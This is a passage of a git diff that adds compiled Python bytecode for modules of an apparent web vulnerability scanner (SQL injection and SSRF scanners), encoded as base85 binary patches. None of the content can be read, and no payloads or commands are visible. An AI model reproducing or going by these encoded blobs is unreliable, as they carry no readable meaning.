z*A}z1{AqBmVuJ+Y8fL;X1CbVYq>@Qg)J%t`2O{;pNSR;6Ypb+~*R;8Lw|TtQf^hB7
zQn;4tO~kU}r}C?<KT*w|jFhy+v-iic_w#VA9pD<+Q{pFet<+wV>|b*?L;5q5Zl6l|
zv%=DSr1Iya67oylMyr4xciY`jSTqoCASHvuM|$ynG(22>0qU>;>X7w<yCGbe-uJE}
z4wa@+U`xxcdJ*xZ+5~wWAQ>VXGK_CP>zZXOP=wZx{eQNergI9{ENTHCN5}y)ianP!
zcS0Gpeju-6B`=Raphr@#2S}?j{0y|Hn|tNd+{>>fUwAh8-i74Xzm|OKT`<#g6PJ_c
zUK75$z+l1Xx#Tl1gVTTW^t;J_emea<xEN&uJDnyWgQ-5^_d}2_vs^*w-ky;HTh(zV
z`y>-`JsA$NPx=F)CkNq;wAD6JUe()L{g|_Q<ZyFe-;?w(yq6xT+x+A~);|CTB()b}
zZ9%J5$s+V*5v9U8&Nx}uAg9~Eud}Or&#qQ_4~qa3Y&7p^HzE<l4un@pxJckE<lSKY
z6z59P&cBtu{5lfOKpekQ#BXzm?EHioU-A?b$MZK{%ilP<?_<-dv%}8}Pvn1ZGw*+y
znqsD=kMh^tRuTo(3p$>%=30KueJF33bH|&WZ;F&O&gRF>tx<F9M{6t}OO<=Bo`{>f
zV&*QWylo^3Yzx`oi?gMmPUe0096WhkHb$TY6|U~ou99j1x2Lk1b{ay$A^7SglLus%
zNxoDjpJ%0aRSvTdc7i}11YBTo&42Uk+@<#*LUr?duicn^JAHk@Cp!b7K|W+FJe(i<
zAo<>F8CDpWKZpV^lf)wMSpxHLyYV5=gOFJg0)@5XBhv;U!w{__dQz_*#4sr=COk%j
zFewiO;T5Dxc+<(L;8nWE#fZ3&BORR5H3&w2NuX4~gZ1g_E%O`G48X7**CDQF0T|}(
zdi(GUdExl@Q_nv&X^-bW6v=<+?ZdwhVyC}awjMS;><i)TtI-*Bc{~m;gBu{osoWm;
zBm`oWNBtfjrv&{6P;C?qVK06X*fA)GnhT(T1)qfA);(DB9jNAJApYzW@ktJ`DnFiG
z9?dTQ&hgiuntCdly=7FHfDLov^oeVEyWX+SHoS8<mbWWr+7;34TDh#TGrT!*Lk7NC
z!|&C=P=M<%9`#V2y6j{(qPt~Ry;zo<n@o#ZqTv@S0}Q&)@!v_@yz(N%L(|tNhV|fO
z0|ZC;M{rKUS8H>ZzIVSxnl2}K?m3`eT>31oI{a`=CB6&S9%<MjezvBP?rsQVx~1t6
z@aD_FCeDp`ieVU?OGj}_U$P&-DM5Gr6md6)(B>sfxp9*vYO+i!Ue{0QUopl^HE~mY
z)KnicHAXaz!aM*|>cTuf4>%!X1eg?A7-OO0Auq<2@q0ZXF5ScXNN<q*q6#9npebj>
zHv)^H$AYx=wB*Sbf#)vH<|*R3$^54&1e-d8LMd-W(20E&sM0kurP>t%cu^*uglC6A
zD|Q+L@Ctzq!tja^6h?a^_zI{-C%ghc4+_5fgD(j9w<Zow=Wq=9-C_7<!@(IGjwixS
zulU5|fOsz(40%01#^;B}YKH?}0682i;x9IY$!Sb@rvrB)i&M_NhRJs!;c^}DsRhKk
zT@J8vtmjA=JOf}yPnFkIuy*LZv6!raUvLW~Unf3N?7XAsC6&56BeKUxWzL<GaPq_L
zsBDcg_mgJ5ayNOWNUz*_r%0yE`BVdmAP~hsBzp#Kf)!R{#2h~MV4ugTaY!Hv?g978
z08WnAbEF2w5I)SnWh8i3IK3>wI8F=E_XB*qU2xiXJ(udvX|@T2x1IeFu;7vkwm<@L
zMUuR&k&%kK8iLgQn#lS!VdVey|3&PK5j(GIv*X&LUuugcT4Gx3Db?>3ok}w24uL7(
Glm7!2G|1-w

literal 0
HcmV?d00001

diff --git a/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..6297d99d334e4b178e9b1ba13c64abc1bc735955
GIT binary patch
literal 17375
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

literal 0
HcmV?d00001

diff --git a/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..7af40bd72ae58197d3a2fd18cfe18aead167e8c0
GIT binary patch
literal 10200
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
